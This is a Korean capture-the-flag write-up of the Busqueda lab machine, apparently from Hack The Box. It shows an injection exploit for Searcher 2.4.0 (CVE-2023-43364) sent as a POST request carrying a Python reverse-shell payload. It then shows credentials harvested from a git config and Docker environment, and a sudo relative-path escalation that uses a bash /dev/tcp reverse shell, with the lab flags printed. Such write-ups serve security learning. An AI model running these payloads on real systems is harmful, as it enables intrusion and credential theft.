Proof of Concept
10.129.228.217
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
80 포트 웹서비스 접근 시 http://searcher.htb로 리다이렉트 됨
┌──(kali㉿kali)-[~/Busqueda]
└─$ curl http://10.129.228.217
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://searcher.htb/">here</a>.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at 10.129.228.217 Port 80</address>
</body></html>/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Busqueda]
└─$ cat /etc/hosts
<SNIP>
10.129.228.217 searcher.htbhttp://searcher.htb 접속 후 Searcher 2.4.0 서비스 사용중인 것을 확인
Searcher 2.4.0 버전에서 RCE 취약점 발견 (CVE-2023-43364)
리버스쉘 연결을 시도하는 POC 실행
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 274
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
engine=Accuweather&query=A5',+exec("import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(('10.10.14.248',80))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(['/bin/sh','-i'])%3b"))%23리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.228.217] 49800
can't access tty; job control turned off
$ idRead user.txt
$ cat user.txt
93f602e6bdcddcfd57d225a9942b1444
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:36:ff brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.228.217/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3130sec preferred_lft 3130sec
inet6 dead:beef::250:56ff:feb0:36ff/64 scope global dynamic mngtmpaddr
valid_lft 86394sec preferred_lft 14394sec
inet6 fe80::250:56ff:feb0:36ff/64 scope link
valid_lft forever preferred_lft forever
<SNIP>Privilege Escalation
“searcher.htb” 관련된 문자열 검색 결과 gitea 계정 정보 발견
- cody:jh1usoih2bkjaspwe92
- http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
svc@busqueda:/var/www/app$ grep -i -r searcher.htb .
grep -i -r searcher.htb .
./templates/index.html: <p class="copyright">searcher.htb © 2023</p>
./.git/logs/HEAD:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000 commit (initial): Initial commit
./.git/logs/refs/heads/main:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000 commit (initial): Initial commit
./.git/logs/refs/remotes/origin/main:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator <administrator@gitea.searcher.htb> 1671970461 +0000 update by push
./.git/config: url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git/etc/hosts 파일에 gitea 서브도메인 추가
┌──(kali㉿kali)-[~/Busqueda]
└─$ cat /etc/hosts
<SNIP>
10.129.228.217 searcher.htb gitea.searcher.htbhttp://gitea.searcher.htb/에 접속하여 이전에 알아낸 cody:jh1usoih2bkjaspwe92로 로그인 성공
발견한 비밀번호 “jh1usoih2bkjaspwe92로”를 사용하여 svc 사용자로 SSH 접속 성공
┌──(kali㉿kali)-[~/Busqueda]
└─$ sshpass -p 'jh1usoih2bkjaspwe92' ssh svc@10.129.228.217
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-69-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Feb 15 06:03:40 AM UTC 2026
System load: 0.10595703125
Usage of /: 80.3% of 8.26GB
Memory usage: 50%
Swap usage: 0%
Processes: 235
Users logged in: 0
IPv4 address for br-c954bf22b8b2: 172.20.0.1
IPv4 address for br-cbf2c5ce8e95: 172.19.0.1
IPv4 address for br-fba5a3e31476: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.129.228.217
IPv6 address for eth0: dead:beef::250:56ff:feb0:36ff
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Apr 4 17:02:09 2023 from 10.10.14.19
svc@busqueda:~$sudo 권한 확인
svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py */opt/scripts/system-checkup.py 스크립트를 이용하여 실행 가능한 기능 확인
- docker-ps
- docker-inspect
- full-checkup
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py -h
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup두 개의 컨테이너(gitea, mysql_db)가 실행중인 것을 확인
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 3 years ago Up 6 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 3 years ago Up 6 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_dbmysql_db 컨테이너 설정에서 패스워드 바력ㄴ
- yuiu1hoiu4i5ho1uh
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' mysql_db | jq
{
"Hostname": "f84a6b33fb5a",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"ExposedPorts": {
"3306/tcp": {},
"33060/tcp": {}
},
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
"MYSQL_USER=gitea",
"MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
"MYSQL_DATABASE=gitea",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"GOSU_VERSION=1.14",
"MYSQL_MAJOR=8.0",
"MYSQL_VERSION=8.0.31-1.el8",
"MYSQL_SHELL_VERSION=8.0.31-1.el8"
],
"Cmd": [
"mysqld"
],
"Image": "mysql:8",
"Volumes": {
"/var/lib/mysql": {}
},
"WorkingDir": "",
"Entrypoint": [
"docker-entrypoint.sh"
],
"OnBuild": null,
"Labels": {
"com.docker.compose.config-hash": "1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b",
"com.docker.compose.container-number": "1",
"com.docker.compose.oneoff": "False",
"com.docker.compose.project": "docker",
"com.docker.compose.project.config_files": "docker-compose.yml",
"com.docker.compose.project.working_dir": "/root/scripts/docker",
"com.docker.compose.service": "db",
"com.docker.compose.version": "1.29.2"
}
}알아낸 비밀번호를 이용하여 Gitea에서 administrator로 로그인 성공
- administrator:yuiu1hoiu4i5ho1uh
Gitea의 administrator/scripts/full-checkup.sh 파일 분석 결과, full-checkup 인자 사용 시 상대 경로(./full-checkup.sh)로 스크립트가 실행되고 있음
#!/bin/bash
import subprocess
import sys
actions = ['full-checkup', 'docker-ps','docker-inspect']
def run_command(arg_list):
r = subprocess.run(arg_list, capture_output=True)
if r.stderr:
output = r.stderr.decode()
else:
output = r.stdout.decode()
return output
def process_action(action):
if action == 'docker-inspect':
try:
_format = sys.argv[2]
if len(_format) == 0:
print(f"Format can't be empty")
exit(1)
container = sys.argv[3]
arg_list = ['docker', 'inspect', '--format', _format, container]
print(run_command(arg_list))
except IndexError:
print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")
exit(1)
except Exception as e:
print('Something went wrong')
exit(1)
elif action == 'docker-ps':
try:
arg_list = ['docker', 'ps']
print(run_command(arg_list))
except:
print('Something went wrong')
exit(1)
elif action == 'full-checkup':
try:
arg_list = ['./full-checkup.sh']
print(run_command(arg_list))
print('[+] Done!')
except:
print('Something went wrong')
exit(1)
<SNIP>리버스쉘 명령을 실행하는 full-checkup.sh 스크립트 파일 생성
svc@busqueda:/tmp$ vi full-checkup.sh
svc@busqueda:/tmp$ cat full-checkup.sh
#! /bin/bash
/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.248/4444 0>&1'
svc@busqueda:/tmp$ chmod a+x full-checkup.shNC 리버스쉘 리스너 실행
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...sudo를 사용하여 full-checkup 실행
svc@busqueda:/tmp$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[+] Done!리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.228.217] 58680
#Read root.txt
┌──(kali㉿kali)-[~/Busqueda]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.228.217] 40858
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
fcdac6a9e7e3e9d50644c54081731f18
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:36:ff brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.228.217/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2373sec preferred_lft 2373sec
inet6 dead:beef::250:56ff:feb0:36ff/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:feb0:36ff/64 scope link
valid_lft forever preferred_lft forever
<SNIP>